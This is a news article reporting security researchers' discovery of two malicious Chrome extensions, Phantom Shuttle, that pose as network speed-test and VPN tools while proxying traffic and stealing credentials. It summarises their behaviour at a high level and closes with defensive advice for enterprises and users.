Cybersecurity researchers have uncovered two malicious Google Chrome extensions named Phantom Shuttle that operate under the guise of multi-location network speed test tools but are capable of intercepting traffic and stealing user credentials. Both extensions, developed by the same individual, are currently available for download. Phantom Shuttle has been advertised for developers and foreign trade personnel, with users paying subscriptions ranging from ¥9.9 to ¥95.9 CNY, believing they are accessing legitimate VPN services. Socket Security researcher Kush Pandya explained that behind this facade, the extensions function as man-in-the-middle proxies, exfiltrating data continuously to a command-and-control server.
The older extension, released in November 2017, has 2,000 users, while a 2023 variant has 180 users. Once subscriptions are activated, VIP users are automatically placed into “smarty” proxy mode, routing traffic from more than 170 targeted domains through the attacker’s infrastructure. The extensions perform genuine latency tests to reinforce their legitimacy, while hidden code injected into JavaScript libraries ensures that hard-coded credentials are automatically used in authentication challenges without user knowledge. This allows the extensions to inject proxy credentials across all HTTP authentication requests, maintaining complete control over traffic.
Once connected to the proxy, the extensions configure Chrome’s proxy settings with modes that allow them to route all traffic or only specific high-value domains. Targeted sites include developer platforms like GitHub, Stack Overflow, and Docker, cloud services such as Amazon Web Services, Microsoft Azure, and Digital Ocean, enterprise tools like Cisco, IBM, and VMware, social media platforms, and adult websites, likely for blackmail purposes. The extensions maintain a continuous heartbeat to the C2 server at phantomshuttle[.]space, transmitting VIP user emails, passwords, and version information every five minutes, allowing ongoing credential exfiltration and session monitoring.
The operation captures passwords, credit card details, cookies, browsing history, API keys, and developer secrets, raising concerns about potential supply chain attacks. Indicators such as Chinese language in the extension descriptions, Alipay and WeChat Pay integration, and hosting on Alibaba Cloud suggest a China-based threat actor. Researchers warn that the subscription model reinforces victim retention while presenting an illusion of legitimacy. Enterprises are advised to implement extension allowlisting, monitor proxy authentication activity, and remove Phantom Shuttle immediately, while users should check for any unusual Chrome extension behavior to prevent ongoing exposure to data theft and network compromise.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
